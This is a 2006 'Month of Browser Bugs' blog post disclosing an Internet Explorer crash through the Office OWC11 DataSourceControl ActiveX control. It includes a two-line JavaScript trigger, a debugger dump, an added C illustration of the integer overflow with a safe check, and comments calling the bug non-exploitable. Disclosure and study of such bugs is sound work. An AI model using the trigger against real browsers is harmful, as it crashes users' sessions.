Wednesday, July 19, 2006

MoBB #19: DataSourceControl getDataMemberName

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system and requires Office 2003 to be installed (older versions of this control have not been tested). Calling the getDataMemberName() method with a large negative integer value results in an integer overflow and a NULL dereference.

var a = new ActiveXObject('OWC11.DataSourceControl.11');
a.getDataMemberName(-0x80000000);

Demonstration

eax=0000001c ebx=025d15a8 ecx=0000001c
edx=387d0e24 esi=0013b234 edi=0013b204
eip=3878cfac esp=0013b1fc ebp=0013b228
OWC11!DllGetClassObject+0x5a3e4:
3878cfac 8b01 mov eax,[ecx] ds:0023:0000001c=????????

This bug will be added to the OSVDB:
Microsoft IE OWC11.DataSourceControl getDataMemberName Method Integer Overflow
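As an added illustration (not code from the original post and not the OWC11 control's own logic), the C program below models why a 32-bit argument of -0x80000000 is trouble: in two's complement it is the same bit pattern as 0x80000000, so a range check that folds the sign by negation lets it through, and scaling it as an index wraps to a small offset. The member table, the naive check and the hardened unsigned comparison are constructed for the demonstration; the control's real arithmetic is not known from the post.

```c
#include <stdint.h>
#include <stdbool.h>
#include <stdio.h>

/* Constructed member table standing in for a control's data members
 * (illustrative model only, not the OWC11 implementation). */
static const char *const MEMBERS[] = { "Orders", "Customers", "Products" };
#define MEMBER_COUNT ((int32_t)(sizeof MEMBERS / sizeof MEMBERS[0]))

/* Two's-complement negation done in unsigned arithmetic so the wrap is
 * well defined in C. On 32 bits, negating INT32_MIN gives INT32_MIN back:
 * 0x80000000 and -0x80000000 are the same bit pattern. */
int32_t wrap_negate(int32_t v) {
    return (int32_t)(0u - (uint32_t)v);
}

/* Naive validation for an API that treats the sign as irrelevant: fold a
 * negative index by negation, then range-check. -5 becomes 5 and is
 * rejected, -1 becomes 1 and is accepted, but INT32_MIN comes back
 * unchanged, is still below MEMBER_COUNT, and passes the check. */
bool naive_index_ok(int32_t idx) {
    if (idx < 0)
        idx = wrap_negate(idx);
    return idx < MEMBER_COUNT;
}

/* Hardened validation: one unsigned comparison against the count rejects
 * every negative value (they all compare as huge) and every out-of-range
 * positive, with no arithmetic on the untrusted value first. */
bool safe_index_ok(int32_t idx) {
    return (uint32_t)idx < (uint32_t)MEMBER_COUNT;
}

/* Byte offset of entry idx in a table of 32-bit pointers. INT32_MIN * 4
 * wraps to 0, one way a scaled index can turn into a near-NULL pointer. */
uint32_t scaled_offset32(int32_t idx) {
    return (uint32_t)idx * (uint32_t)sizeof(uint32_t);
}

/* Lookup that applies the hardened check; NULL means "rejected". */
const char *safe_lookup(int32_t idx) {
    return safe_index_ok(idx) ? MEMBERS[idx] : NULL;
}

int main(void) {
    printf("naive check accepts INT32_MIN: %d\n", naive_index_ok(INT32_MIN));
    printf("safe check accepts INT32_MIN:  %d\n", safe_index_ok(INT32_MIN));
    printf("scaled 32-bit offset of INT32_MIN: 0x%08x\n", scaled_offset32(INT32_MIN));
    return 0;
}
```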

5 Comments:

At 3:07 PM, Anonymous XXLS said...

Office 2002 affected too. You can use "OWC10.DataSourceControl.10" or "OWC9.DataSourceControl.9".

hdm, is this exploitable? Seems non-exploitable to me.

 
At 3:17 PM, Blogger hdm said...

Doesn't look exploitable.

 
At 10:59 PM, Anonymous Anonymous said...

Where the exploitable shiat? This is boring...

 
At 11:00 PM, Anonymous Anonymous said...

It's not all that negative.
The sign does not matter.

0x80000000 == -0x80000000

(assuming 32-bit of course)

 
At 11:01 PM, Anonymous Anonymous said...

It's not all that negative.
The sign does not matter.

0x80000000 == -0x80000000

(assuming 32-bit of course)

 
